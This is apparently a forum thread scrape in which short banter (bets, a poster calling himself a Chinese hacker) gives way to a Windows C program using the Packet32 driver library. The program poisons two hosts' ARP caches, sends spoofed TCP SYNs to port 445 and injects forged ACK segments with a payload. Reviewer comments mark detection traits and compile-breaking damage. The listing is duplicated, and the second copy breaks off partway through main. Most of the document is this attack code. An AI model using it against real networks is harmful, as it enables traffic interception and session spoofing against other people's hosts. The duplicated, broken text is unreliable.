I bet $8.00 he won't return. floodhound2 wrote: I bet $5.oo he will not return. Any takers?
a Chinese hacker
I bet $10.oo ...^ So many messages, ah! Let me explain my technique first...
HERE This is a picture....
Prior said, and I have come to conduct exchanges, not for the quarrel.
2000.5 do you know ??? I have come to promote peace
If you like to discuss these,you can go to http://www.cia.gov/
Cheers!!!
HERE This is a picture....
Prior said, and I have come to conduct exchanges, not for the quarrel.
2000.5 do you know ??? I have come to promote peace
If you like to discuss these,you can go to http://www.cia.gov/
Cheers!!!
#include "stdafx.h"
#include "winsock2.h"
#include "Packet32.h"
#include "stdio.h"
#pragma comment(lib, "packet"
#pragma comment(lib, "ws2_32"
// Hard-coded addresses used throughout the listing. MAC strings are 12 hex digits
// with no separators; StrToMac maps only the lowercase letters a-f.
//   SIMULATE_*  - the host whose IP address the forged frames claim to come from
//   TARGET_*    - the host the forged frames are sent to
//   LOCAL_MAC   - written as the Ethernet source of every frame this program sends
#define SIMULATE_MAC "0011111d735a"
#define TARGET_MAC "001111c6f7fe"
#define LOCAL_MAC "00e06e41508f"
#define TARGET_IP "211.83.97.24"
#define SIMULATE_IP "211.83.97.16"
// Receive-filter value passed to PacketSetHwFilter in ListenACK.
#define NDIS_PACKET_TYPE_DIRECTED 0x0001
#pragma pack(push, 1)
// Ethernet II frame header; 14 bytes with the #pragma pack(push, 1) in effect here.
struct ET_HEADER
{
unsigned char eh_dst[6]; // destination MAC
unsigned char eh_src[6]; // source MAC
unsigned short eh_type; // EtherType in network byte order; this file uses 0x0800 (IPv4) and 0x0806 (ARP)
};
// ARP payload for Ethernet/IPv4, filled in by ArpCheat. The layout relies on the
// enclosing #pragma pack(push, 1) and on `unsigned long` being 32 bits wide
// (true for the Windows toolchains this listing targets).
struct ARP_HEADER
{
unsigned short arp_hdr; // hardware type; ArpCheat writes htons(0x0001)
unsigned short arp_pro; // protocol type; ArpCheat writes htons(0x0800)
unsigned char arp_hln; // hardware address length; set to 6
unsigned char arp_pln; // protocol address length; set to 4
unsigned short arp_opt; // opcode; ArpCheat writes htons(0x0002), an ARP reply
unsigned char arp_sha[6]; // sender hardware address
unsigned long arp_spa; // sender protocol (IPv4) address
unsigned char arp_tha[6]; // target hardware address
unsigned long arp_tpa; // target protocol (IPv4) address
};
// Fixed 20-byte IPv4 header with no options. Multi-byte fields are stored in
// network byte order by the code that fills them.
struct IP_HEADER
{
char m_ver_hlen; // version in the high nibble, header length in 32-bit words in the low nibble
char m_tos; // type of service
USHORT m_tlen; // total length of the IP datagram
USHORT m_ident; // identification; taken from the global ipID counter
USHORT m_flag_frag; // flags and fragment offset
char m_ttl; // time to live
char m_protocol; // payload protocol; IPPROTO_TCP everywhere in this file
USHORT m_cksum; // header checksum, computed by CheckSum with this field zeroed
ULONG m_sIP; // source address
ULONG m_dIP; // destination address
};
// Fixed 20-byte TCP header; options, when present, follow as a TCP_OPTION.
struct TCP_HEADER
{
USHORT m_sport; // source port
USHORT m_dport; // destination port
ULONG m_seq; // sequence number
ULONG m_ack; // acknowledgement number
char m_hlen_res4; // data offset (32-bit words) in the high nibble
char m_res2_flag; // flag bits; this file uses 0x02 (SYN), 0x10 (ACK) and 0x12 (SYN+ACK)
USHORT m_win; // advertised window
USHORT m_cksum; // checksum over pseudo-header, TCP header and payload
USHORT m_urp; // urgent pointer
};
// TCP pseudo-header. It is never transmitted; it is only prepended to the TCP
// segment in a scratch buffer so CheckSum can cover the addresses as well.
struct PSD_HEADER
{
ULONG m_saddr; // source IPv4 address
ULONG m_daddr; // destination IPv4 address
char m_mbz; // must be zero
char m_ptcl; // protocol number (IPPROTO_TCP)
USHORT m_tcpl; // TCP length (header + options/payload), network byte order
};
// The 8 bytes of TCP options appended to the SYN built in SendSyn. The comments
// give the values SendSyn writes and what they encode.
struct TCP_OPTION
{
USHORT unKnown; // htons(516) = 0x02 0x04: option kind 2 (maximum segment size), length 4
USHORT maxSegSize; // the MSS value itself; SendSyn writes 1460
char no1; // 1 = no-operation padding
char no2; // 1 = no-operation padding
USHORT SACK; // htons(1026) = 0x04 0x02: option kind 4 (SACK permitted), length 2
};
// Parameter block handed to each ArpCheat thread. All three members are text;
// main fills them with memcpy into zero-initialised storage, which is what keeps
// them NUL-terminated.
struct CHEAT_ARP_INFO
{
char simulateIP[20]; // dotted-quad IP written as the ARP sender protocol address
char targetIP[20]; // dotted-quad IP written as the ARP target protocol address
char targetMAC[13]; // 12 hex digits + NUL; the frame's destination MAC
};
#pragma pack(pop)
// Forward declarations for the functions defined below. Info() is declared here
// and called from main, but its definition is not part of this listing.
USHORT CheckSum(USHORT *buffer, int size);
void StrToMac(char *str,char *mac);
void ListenACK();
void AssayAndSendData(LPPACKET lpPacket);
DWORD WINAPI ArpCheat(void *pInfo);
DWORD WINAPI SendSyn(void *no);
void Info();
// Shared state. lpAdapter is assigned once in main and then used by every thread.
// ipID is incremented from both SendSyn (its own thread) and AssayAndSendData
// (main thread) with no synchronisation.
LPADAPTER lpAdapter=NULL;
USHORT ipID=1638; // next IP identification value
USHORT sourcePort=1056; // next TCP source port; SendSyn increments it once per SYN
USHORT targetPort=445; // TCP destination port of the SYNs
// Entry point. Opens the adapter named in adapter_list[0], starts two ArpCheat
// threads (one aimed at TARGET, one at SIMULATE) and one SendSyn thread, then
// blocks in ListenACK on the main thread.
//
// Returns -1 if Winsock start-up, adapter enumeration or adapter open fails.
// ListenACK loops forever, so the cleanup calls and `return 0` at the bottom are
// not reached in practice.
//
// What the two ArpCheat threads put on the wire: unsolicited ARP replies, one
// stream telling TARGET that SIMULATE_IP is at LOCAL_MAC and one telling SIMULATE
// that TARGET_IP is at LOCAL_MAC.
//
// NOTE(review): the listing as posted is damaged; the `while` and inner `if`
// conditions below have unbalanced parentheses, so it does not compile as shown.
int main(int argc, char* argv[])
{
Info();
WSADATA wsaData;
if(WSAStartup(MAKEWORD(2,1), &wsaData)!=0)
{
printf("WSAStartup error!\n");
return -1;
}
// Adapter names are returned as a run of NUL-terminated strings; the buffer is
// walked as wide characters here.
WCHAR adapter_name[2048]={0};
ULONG adapter_length=1024;
if(PacketGetAdapterNames((char*)adapter_name, &adapter_length)==FALSE)
{
printf("PacketGetAdapterNames error:%d\n",GetLastError());
return -1;
}
WCHAR *name1,*name2;
ULONG i;
static CHAR adapter_list[10][1024];
name1=adapter_name;
name2=adapter_name;
i=0;
// Walk the list until two consecutive terminators are seen.
// NOTE(review): on the first iteration `*(name1-1)` reads one element before
// adapter_name; every memcpy writes to the start of adapter_list; and `i` is
// never checked against the 10-row capacity.
while((*name1!='\0'|| (*(name1-1)!='\0'))
{
if(*name1=='\0'
{
memcpy(adapter_list,name2,2*(name1-name2));
name2=name1+1;
i++;
}
name1++;
}
lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)adapter_list[0]);
if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
printf("Unable to open the driver, Error Code : %lx\n", GetLastError());
return -1;
}
// info1/info2 live on main's stack and are passed by pointer; ArpCheat copies
// the struct on entry. The zero-initialisation supplies the string terminators
// because memcpy copies strlen() bytes only.
// NOTE(review): the thread handles returned by CreateThread are discarded and
// never closed, and thread-creation failure is not checked.
CHEAT_ARP_INFO info1={0},info2={0};
memcpy(info1.simulateIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info1.targetIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info1.targetMAC,TARGET_MAC,strlen(TARGET_MAC));
::CreateThread(NULL,0,ArpCheat,&info1,0,NULL);
memcpy(info2.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info2.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info2.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info2,0,NULL);
Sleep(50);
::CreateThread(NULL,0,SendSyn,NULL,0,NULL);
ListenACK();
PacketCloseAdapter(lpAdapter);
::WSACleanup();
return 0;
}
// Thread routine: roughly every 100 ms builds and transmits one raw
// Ethernet/IPv4/TCP SYN frame from SIMULATE_IP to TARGET_IP:targetPort, with
// LOCAL_MAC as the Ethernet source. `no` is unused. The loop never terminates,
// so the final `return 0` is not reached.
//
// Properties of the traffic that are visible in this code and useful for
// detection: the IP source is SIMULATE_IP while the Ethernet source is
// LOCAL_MAC; the TCP source port and the IP identification both increase by one
// per frame; and each frame is handed to the driver as a fixed 128-byte buffer,
// so the 62 bytes of headers are followed by zero padding.
//
// NOTE(review): both `continue` paths skip PacketFreePacket and the Sleep, so a
// persistent failure leaks one packet object per iteration in a tight loop.
// PacketAllocatePacket's result is not checked for NULL.
DWORD WINAPI SendSyn(void *no)
{
Sleep(100);
while(TRUE)
{
char s_mac[6]={0},d_mac[6]={0};
char sendSynBuf[128]={0};
ET_HEADER et_header={0};
IP_HEADER ip_header={0};
TCP_HEADER tcp_header={0};
TCP_OPTION tcp_option={0};
PSD_HEADER psd_header={0};
StrToMac(LOCAL_MAC,s_mac); //local_mac
memcpy(et_header.eh_src,s_mac,6);
StrToMac(TARGET_MAC,d_mac); //dest_mac
memcpy(et_header.eh_dst,d_mac,6);
et_header.eh_type=htons(0x0800);
// IPv4 header: version 4, 5 words long (no options).
ip_header.m_ver_hlen=(4<<4|5);
ip_header.m_tos=0;
ip_header.m_tlen=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
ip_header.m_ident=htons(ipID++);
// 16384 = 0x4000: Don't Fragment set, fragment offset 0.
ip_header.m_flag_frag=htons(16384);
ip_header.m_ttl=128;
ip_header.m_protocol=IPPROTO_TCP;
// The checksum field must be zero while the checksum is computed.
ip_header.m_cksum=0;
ip_header.m_sIP=inet_addr(SIMULATE_IP);
ip_header.m_dIP=inet_addr(TARGET_IP);
ip_header.m_cksum=CheckSum((USHORT *)&ip_header,sizeof(IP_HEADER));
// Fill in the TCP header and the TCP options:
tcp_header.m_dport=htons(targetPort);
tcp_header.m_sport=htons(sourcePort++);
// Initial sequence number taken from the tick count (stored without htonl).
tcp_header.m_seq=::GetTickCount();
tcp_header.m_ack=0;
// Data offset = (20-byte header + 8 bytes of options) / 4 = 7 words.
tcp_header.m_hlen_res4=(((sizeof(TCP_HEADER)+sizeof(TCP_OPTION))/4)<<4);
tcp_header.m_res2_flag=2; // SYN only
tcp_header.m_win=htons(16384);
tcp_header.m_cksum=0;
tcp_header.m_urp=0;
// Options: MSS 1460, two no-ops, SACK permitted.
tcp_option.unKnown=htons(516);
tcp_option.maxSegSize=htons(1460);
tcp_option.no1=1;
tcp_option.no2=1;
tcp_option.SACK=htons(1026);
// The TCP checksum covers pseudo-header + header + options, assembled in a
// scratch buffer that is never sent.
psd_header.m_daddr=ip_header.m_dIP;
psd_header.m_saddr=ip_header.m_sIP;
psd_header.m_mbz=0;
psd_header.m_ptcl=IPPROTO_TCP;
psd_header.m_tcpl=htons(sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
char tcpBuf[128]={0};
memcpy(tcpBuf,&psd_header,sizeof(PSD_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER)+sizeof(TCP_HEADER),&tcp_option,sizeof(TCP_OPTION));
tcp_header.m_cksum=CheckSum((USHORT *)tcpBuf,sizeof(PSD_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
// Assemble the frame that is actually transmitted.
memcpy(sendSynBuf,&et_header,sizeof(ET_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER),&ip_header,sizeof(IP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER)+sizeof(TCP_HEADER),&tcp_option,sizeof(TCP_OPTION));
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket();
// The whole 128-byte buffer is registered, not just the bytes filled in above.
PacketInitPacket(lpPacket,sendSynBuf,128);
if(PacketSetNumWrites(lpAdapter,1)==FALSE)
{
printf("Warning: Unable to send more than one packet in a single write!\n");
continue;
}
if(PacketSendPacket(lpAdapter,lpPacket,TRUE)==FALSE)
{
printf("Error sending the packets!\n");
continue;
}
PacketFreePacket(lpPacket);
Sleep(100);
}
return 0;
}
// Thread routine: builds one ARP reply (opcode 2) and resends it every 3 seconds
// until PacketSendPacket fails, then frees the packet and returns 0.
//
// pInfo points to a CHEAT_ARP_INFO, which is copied locally on entry. The frame
// is addressed to info.targetMAC and carries info.simulateIP as the sender IP
// with LOCAL_MAC as the sender hardware address.
//
// Detection-relevant properties visible here: the replies are unsolicited,
// repeat on a fixed 3000 ms period, and bind info.simulateIP to LOCAL_MAC. That
// is the pattern ARP-monitoring tools and switch-level ARP inspection look for.
//
// NOTE(review): PacketAllocatePacket's result is not checked, and a failed
// PacketSetNumWrites only prints a warning before sending goes ahead.
DWORD WINAPI ArpCheat(void *pInfo)
{
CHEAT_ARP_INFO info={0};
memcpy(&info,pInfo,sizeof(CHEAT_ARP_INFO));
char s_mac[6]={0},d_mac[6]={0};
ET_HEADER et_header={0};
ARP_HEADER arp_header={0};
char buffer[64]={0};
StrToMac(LOCAL_MAC,s_mac);
memcpy(et_header.eh_src,s_mac,6);
StrToMac(info.targetMAC,d_mac);
memcpy(et_header.eh_dst,d_mac,6);
et_header.eh_type=htons(0x0806);
// Ethernet (1) / IPv4 (0x0800) ARP with 6-byte and 4-byte addresses.
arp_header.arp_hdr=htons(0x0001);
arp_header.arp_pro=htons(0x0800);
arp_header.arp_hln=6;
arp_header.arp_pln=4;
arp_header.arp_opt=htons(0x0002);
arp_header.arp_spa=inet_addr(info.simulateIP); //source_ip
// Sender hardware address is copied from the Ethernet source, i.e. LOCAL_MAC.
memcpy(arp_header.arp_sha,et_header.eh_src,6);
arp_header.arp_tpa=inet_addr(info.targetIP); //target_ip
memcpy(arp_header.arp_tha,et_header.eh_dst,6);
memcpy(buffer,&et_header,sizeof(ET_HEADER));
memcpy(buffer+sizeof(ET_HEADER),&arp_header,sizeof(ARP_HEADER));
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket();
// All 64 bytes are registered; the 42 bytes of headers are followed by zeros.
PacketInitPacket(lpPacket,buffer,64);
if(PacketSetNumWrites(lpAdapter,1)==FALSE)
printf("warning: Unable to send more than one packet in a single write!\n");
while(TRUE)
{
if(PacketSendPacket(lpAdapter,lpPacket,TRUE)==FALSE)
{
printf("Error sending the packets!\n");
break;
}
Sleep(3000);
}
PacketFreePacket(lpPacket);
return 0;
}
// Receive loop run on the main thread. Configures the adapter (hardware filter
// NDIS_PACKET_TYPE_DIRECTED, 1024-byte driver buffer, read timeout 2) and then
// repeatedly reads into a 512-byte buffer and hands each read to
// AssayAndSendData.
//
// NOTE(review): the loop has no exit condition, so the PacketFreePacket and
// `return` after it are unreachable; if they were reached, lpPacket would be
// freed a second time. Return values of the PacketSet* calls and of
// PacketAllocatePacket are not checked.
void ListenACK()
{
LPPACKET lpPacket;
char recvBuf[512]={0};
PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_DIRECTED);
PacketSetBuff(lpAdapter,1024);
PacketSetReadTimeout(lpAdapter,2);
while(TRUE)
{
// A packet object is allocated and freed on every iteration.
lpPacket=PacketAllocatePacket();
PacketInitPacket(lpPacket,recvBuf,512);
if(PacketReceivePacket(lpAdapter,lpPacket,TRUE)==TRUE)
AssayAndSendData(lpPacket);
else
printf("Recv Error!\n");
PacketFreePacket(lpPacket);
// Clear the buffer so a later read cannot be confused with stale bytes.
memset(recvBuf,0,512);
Sleep(10);
}
PacketFreePacket(lpPacket);
return;
}
// Computes the 16-bit one's-complement checksum used by the IPv4 and TCP headers.
//
// buffer: start of the data, read as consecutive 16-bit words.
// size:   number of bytes to cover; a trailing odd byte is added on its own.
// Returns the complemented, folded sum; the caller stores it as-is in the header.
USHORT CheckSum(USHORT *buffer, int size)
{
    unsigned long sum = 0;
    const USHORT *word = buffer;
    int remaining = size;

    // Add up every complete 16-bit word.
    for (; remaining > 1; remaining -= sizeof(USHORT))
    {
        sum += *word;
        ++word;
    }

    // A leftover byte contributes its value once.
    if (remaining != 0)
    {
        sum += *reinterpret_cast<const UCHAR *>(word);
    }

    // Fold the carries back into the low 16 bits, twice, then complement.
    sum = (sum & 0xffff) + (sum >> 16);
    sum += sum >> 16;
    return (USHORT)(~sum);
}
// Converts a 12-character hexadecimal MAC string (no separators) into 6 bytes.
//
// str: input text; two characters are consumed per output byte. Only the
//      lowercase letters a-f are mapped as hex digits; every other character
//      is passed through atoi.
// mac: destination for the 6 decoded bytes.
//
// NOTE(review): the listing as posted appears damaged by the forum rendering.
// The store at the end of the loop assigns an int to the `mac` pointer itself,
// which does not compile and would not fill the caller's buffer.
// NOTE(review): `atoi(&temp)` is given the address of a single char with no
// terminating NUL, so it can read past `temp`. Uppercase A-F and non-hex
// characters are not rejected; they become whatever atoi returns.
void StrToMac(char *str,char *mac)
{
char *str1;
int i;
int low,high;
char temp;
for(i=0;i<6;i++)
{
str1=str+1;
// High nibble: first character of the pair.
switch(*str)
{
case 'a':high=10;
break;
case 'b':high=11;
break;
case 'c':high=12;
break;
case 'd':high=13;
break;
case 'e':high=14;
break;
case 'f':high=15;
break;
default:temp=*str;
high=atoi(&temp);
}
// Low nibble: second character of the pair.
switch(*str1)
{
case 'a':low=10;
break;
case 'b':low=11;
break;
case 'c':low=12;
break;
case 'd':low=13;
break;
case 'e':low=14;
break;
case 'f':low=15;
break;
default:temp=*str1;
low=atoi(&temp);
}
mac=high*16+low;
str+=2;
}
}
// Inspects one captured buffer and, if it starts with an IPv4/TCP segment from
// TARGET_IP to SIMULATE_IP that has the ACK flag set and a non-zero window,
// transmits a forged ACK segment in the opposite direction carrying the 10-byte
// payload in `data`.
//
// lpPacket: packet object filled by PacketReceivePacket; its Buffer begins with
//           a bpf_hdr followed by the captured frame.
//
// The reply reuses the peer's ports (swapped), takes its sequence number from
// the peer's acknowledgement number, and is sent with SIMULATE_IP as the IP
// source and LOCAL_MAC as the Ethernet source, the same address mismatch that
// marks the frames built by SendSyn.
//
// NOTE(review): captured, attacker-independent network data is parsed with no
// length checks: neither lpPacket->ulBytesReceived nor the bpf_hdr capture
// length is consulted before the Ethernet, IP and TCP headers are dereferenced.
// The IP header is assumed to be exactly 20 bytes (the IHL nibble is ignored),
// and the `-40` below assumes 20-byte IP and TCP headers. Only the first packet
// in the capture buffer is examined.
// NOTE(review): both early `return` paths leak lpSendPacket; `addr` is unused;
// the line containing only `:` is not valid C++ and looks like forum-rendering
// damage.
void AssayAndSendData(LPPACKET lpPacket)
{
char *buf;
bpf_hdr *lpBpfhdr;
ET_HEADER *lpEthdr;
in_addr addr={0};
buf=(char *)lpPacket->Buffer;
lpBpfhdr=(bpf_hdr *)buf;
// The captured frame starts bh_hdrlen bytes into the buffer.
lpEthdr=(ET_HEADER *)(buf+lpBpfhdr->bh_hdrlen);
if(lpEthdr->eh_type==htons(0x0800))
{
IP_HEADER *lpIphdr=(IP_HEADER *)(buf+lpBpfhdr->bh_hdrlen+sizeof(ET_HEADER));
if( ( inet_addr(SIMULATE_IP)==lpIphdr->m_dIP ) && ( inet_addr(TARGET_IP)==lpIphdr->m_sIP ) && (lpIphdr->m_protocol==IPPROTO_TCP) )
{
TCP_HEADER *lpTcphdr=(TCP_HEADER *)(buf+lpBpfhdr->bh_hdrlen+sizeof(ET_HEADER)+sizeof(IP_HEADER));
// Only segments with ACK set and a non-zero window are answered.
if( ( (lpTcphdr->m_res2_flag & 0x10)!=0 ) && ( lpTcphdr->m_win!=0 ) )
{
char s_mac[6]={0},d_mac[6]={0};
char sendSynBuf[128]={0};
char *data="ffantasyYD";
ET_HEADER et_header={0};
IP_HEADER ip_header={0};
TCP_HEADER tcp_header={0};
PSD_HEADER psd_header={0};
StrToMac(LOCAL_MAC,s_mac); //local_mac
memcpy(et_header.eh_src,s_mac,6);
StrToMac(TARGET_MAC,d_mac); //dest_mac
memcpy(et_header.eh_dst,d_mac,6);
et_header.eh_type=htons(0x0800);
ip_header.m_ver_hlen=(4<<4|5);
ip_header.m_tos=0;
ip_header.m_tlen=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)+strlen(data));
ip_header.m_ident=htons(ipID++);
ip_header.m_flag_frag=htons(16384);
ip_header.m_ttl=128;
ip_header.m_protocol=IPPROTO_TCP;
ip_header.m_cksum=0;
ip_header.m_sIP=inet_addr(SIMULATE_IP);
ip_header.m_dIP=inet_addr(TARGET_IP);
ip_header.m_cksum=CheckSum((USHORT *)&ip_header,sizeof(IP_HEADER));
// Ports are swapped relative to the received segment; both stay in
// network byte order, so no conversion is applied.
tcp_header.m_dport=lpTcphdr->m_sport;
tcp_header.m_sport=lpTcphdr->m_dport;
tcp_header.m_seq=lpTcphdr->m_ack;
// Exactly SYN+ACK (0x12): acknowledge the peer's sequence number + 1.
// Otherwise: acknowledge sequence number + (IP total length - 40).
if(lpTcphdr->m_res2_flag==0x12)
tcp_header.m_ack=htonl(ntohl(lpTcphdr->m_seq)+1);
else
tcp_header.m_ack=htonl(ntohl(lpTcphdr->m_seq)+ntohs(lpIphdr->m_tlen)-40);
tcp_header.m_hlen_res4=((sizeof(TCP_HEADER)/4)<<4);
tcp_header.m_res2_flag=0x10; // ACK only
tcp_header.m_win=lpTcphdr->m_win;
tcp_header.m_cksum=0;
tcp_header.m_urp=0;
// TCP checksum over pseudo-header + header + payload, built in a scratch
// buffer that is never sent.
psd_header.m_daddr=ip_header.m_dIP;
psd_header.m_saddr=ip_header.m_sIP;
psd_header.m_mbz=0;
psd_header.m_ptcl=IPPROTO_TCP;
psd_header.m_tcpl=htons(sizeof(TCP_HEADER)+strlen(data));
char tcpBuf[128]={0};
memcpy(tcpBuf,&psd_header,sizeof(PSD_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER)+sizeof(TCP_HEADER),data,strlen(data));
tcp_header.m_cksum=CheckSum((USHORT *)tcpBuf,sizeof(PSD_HEADER)+sizeof(TCP_HEADER)+strlen(data));
memcpy(sendSynBuf,&et_header,sizeof(ET_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER),&ip_header,sizeof(IP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER)+sizeof(TCP_HEADER),data,strlen(data));
:
LPPACKET lpSendPacket;
lpSendPacket=PacketAllocatePacket();
// The full 128-byte buffer is registered, so the frame is zero-padded.
PacketInitPacket(lpSendPacket,sendSynBuf,128);
if(PacketSetNumWrites(lpAdapter,1)==FALSE)
{
printf("Warning: Unable to send more than one packet in a single write!\n");
return;
}
if(PacketSendPacket(lpAdapter,lpSendPacket,TRUE)==FALSE)
{
printf("Error sending the packets!\n");
return;
}
PacketFreePacket(lpSendPacket);
}
}
}
return;
}
#include "winsock2.h"
#include "Packet32.h"
#include "stdio.h"
#pragma comment(lib, "packet"
#pragma comment(lib, "ws2_32"
// Hard-coded addresses used throughout the listing. MAC strings are 12 hex digits
// with no separators; StrToMac maps only the lowercase letters a-f.
//   SIMULATE_*  - the host whose IP address the forged frames claim to come from
//   TARGET_*    - the host the forged frames are sent to
//   LOCAL_MAC   - written as the Ethernet source of every frame this program sends
#define SIMULATE_MAC "0011111d735a"
#define TARGET_MAC "001111c6f7fe"
#define LOCAL_MAC "00e06e41508f"
#define TARGET_IP "211.83.97.24"
#define SIMULATE_IP "211.83.97.16"
// Receive-filter value passed to PacketSetHwFilter in ListenACK.
#define NDIS_PACKET_TYPE_DIRECTED 0x0001
#pragma pack(push, 1)
// Ethernet II frame header; 14 bytes with the #pragma pack(push, 1) in effect here.
struct ET_HEADER
{
unsigned char eh_dst[6]; // destination MAC
unsigned char eh_src[6]; // source MAC
unsigned short eh_type; // EtherType in network byte order; this file uses 0x0800 (IPv4) and 0x0806 (ARP)
};
// ARP payload for Ethernet/IPv4, filled in by ArpCheat. The layout relies on the
// enclosing #pragma pack(push, 1) and on `unsigned long` being 32 bits wide
// (true for the Windows toolchains this listing targets).
struct ARP_HEADER
{
unsigned short arp_hdr; // hardware type; ArpCheat writes htons(0x0001)
unsigned short arp_pro; // protocol type; ArpCheat writes htons(0x0800)
unsigned char arp_hln; // hardware address length; set to 6
unsigned char arp_pln; // protocol address length; set to 4
unsigned short arp_opt; // opcode; ArpCheat writes htons(0x0002), an ARP reply
unsigned char arp_sha[6]; // sender hardware address
unsigned long arp_spa; // sender protocol (IPv4) address
unsigned char arp_tha[6]; // target hardware address
unsigned long arp_tpa; // target protocol (IPv4) address
};
// Fixed 20-byte IPv4 header with no options. Multi-byte fields are stored in
// network byte order by the code that fills them.
struct IP_HEADER
{
char m_ver_hlen; // version in the high nibble, header length in 32-bit words in the low nibble
char m_tos; // type of service
USHORT m_tlen; // total length of the IP datagram
USHORT m_ident; // identification; taken from the global ipID counter
USHORT m_flag_frag; // flags and fragment offset
char m_ttl; // time to live
char m_protocol; // payload protocol; IPPROTO_TCP everywhere in this file
USHORT m_cksum; // header checksum, computed by CheckSum with this field zeroed
ULONG m_sIP; // source address
ULONG m_dIP; // destination address
};
// Fixed 20-byte TCP header; options, when present, follow as a TCP_OPTION.
struct TCP_HEADER
{
USHORT m_sport; // source port
USHORT m_dport; // destination port
ULONG m_seq; // sequence number
ULONG m_ack; // acknowledgement number
char m_hlen_res4; // data offset (32-bit words) in the high nibble
char m_res2_flag; // flag bits; this file uses 0x02 (SYN), 0x10 (ACK) and 0x12 (SYN+ACK)
USHORT m_win; // advertised window
USHORT m_cksum; // checksum over pseudo-header, TCP header and payload
USHORT m_urp; // urgent pointer
};
// TCP pseudo-header. It is never transmitted; it is only prepended to the TCP
// segment in a scratch buffer so CheckSum can cover the addresses as well.
struct PSD_HEADER
{
ULONG m_saddr; // source IPv4 address
ULONG m_daddr; // destination IPv4 address
char m_mbz; // must be zero
char m_ptcl; // protocol number (IPPROTO_TCP)
USHORT m_tcpl; // TCP length (header + options/payload), network byte order
};
// The 8 bytes of TCP options appended to the SYN built in SendSyn. The comments
// give the values SendSyn writes and what they encode.
struct TCP_OPTION
{
USHORT unKnown; // htons(516) = 0x02 0x04: option kind 2 (maximum segment size), length 4
USHORT maxSegSize; // the MSS value itself; SendSyn writes 1460
char no1; // 1 = no-operation padding
char no2; // 1 = no-operation padding
USHORT SACK; // htons(1026) = 0x04 0x02: option kind 4 (SACK permitted), length 2
};
// Parameter block handed to each ArpCheat thread. All three members are text;
// main fills them with memcpy into zero-initialised storage, which is what keeps
// them NUL-terminated.
struct CHEAT_ARP_INFO
{
char simulateIP[20]; // dotted-quad IP written as the ARP sender protocol address
char targetIP[20]; // dotted-quad IP written as the ARP target protocol address
char targetMAC[13]; // 12 hex digits + NUL; the frame's destination MAC
};
#pragma pack(pop)
// Forward declarations for the functions defined below. Info() is declared here
// and called from main, but its definition is not part of this listing.
USHORT CheckSum(USHORT *buffer, int size);
void StrToMac(char *str,char *mac);
void ListenACK();
void AssayAndSendData(LPPACKET lpPacket);
DWORD WINAPI ArpCheat(void *pInfo);
DWORD WINAPI SendSyn(void *no);
void Info();
// Shared state. lpAdapter is assigned once in main and then used by every thread.
// ipID is incremented from both SendSyn (its own thread) and AssayAndSendData
// (main thread) with no synchronisation.
LPADAPTER lpAdapter=NULL;
USHORT ipID=1638; // next IP identification value
USHORT sourcePort=1056; // next TCP source port; SendSyn increments it once per SYN
USHORT targetPort=445; // TCP destination port of the SYNs
// Entry point. Opens the adapter named in adapter_list[0], starts two ArpCheat
// threads (one aimed at TARGET, one at SIMULATE) and one SendSyn thread, then
// blocks in ListenACK on the main thread.
//
// Returns -1 if Winsock start-up, adapter enumeration or adapter open fails.
// ListenACK loops forever, so the cleanup calls and `return 0` at the bottom are
// not reached in practice.
//
// What the two ArpCheat threads put on the wire: unsolicited ARP replies, one
// stream telling TARGET that SIMULATE_IP is at LOCAL_MAC and one telling SIMULATE
// that TARGET_IP is at LOCAL_MAC.
//
// NOTE(review): the listing as posted is damaged; the `while` and inner `if`
// conditions below have unbalanced parentheses, so it does not compile as shown.
int main(int argc, char* argv[])
{
Info();
WSADATA wsaData;
if(WSAStartup(MAKEWORD(2,1), &wsaData)!=0)
{
printf("WSAStartup error!\n");
return -1;
}
// Adapter names are returned as a run of NUL-terminated strings; the buffer is
// walked as wide characters here.
WCHAR adapter_name[2048]={0};
ULONG adapter_length=1024;
if(PacketGetAdapterNames((char*)adapter_name, &adapter_length)==FALSE)
{
printf("PacketGetAdapterNames error:%d\n",GetLastError());
return -1;
}
WCHAR *name1,*name2;
ULONG i;
static CHAR adapter_list[10][1024];
name1=adapter_name;
name2=adapter_name;
i=0;
// Walk the list until two consecutive terminators are seen.
// NOTE(review): on the first iteration `*(name1-1)` reads one element before
// adapter_name; every memcpy writes to the start of adapter_list; and `i` is
// never checked against the 10-row capacity.
while((*name1!='\0'|| (*(name1-1)!='\0'))
{
if(*name1=='\0'
{
memcpy(adapter_list,name2,2*(name1-name2));
name2=name1+1;
i++;
}
name1++;
}
lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)adapter_list[0]);
if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
printf("Unable to open the driver, Error Code : %lx\n", GetLastError());
return -1;
}
// info1/info2 live on main's stack and are passed by pointer; ArpCheat copies
// the struct on entry. The zero-initialisation supplies the string terminators
// because memcpy copies strlen() bytes only.
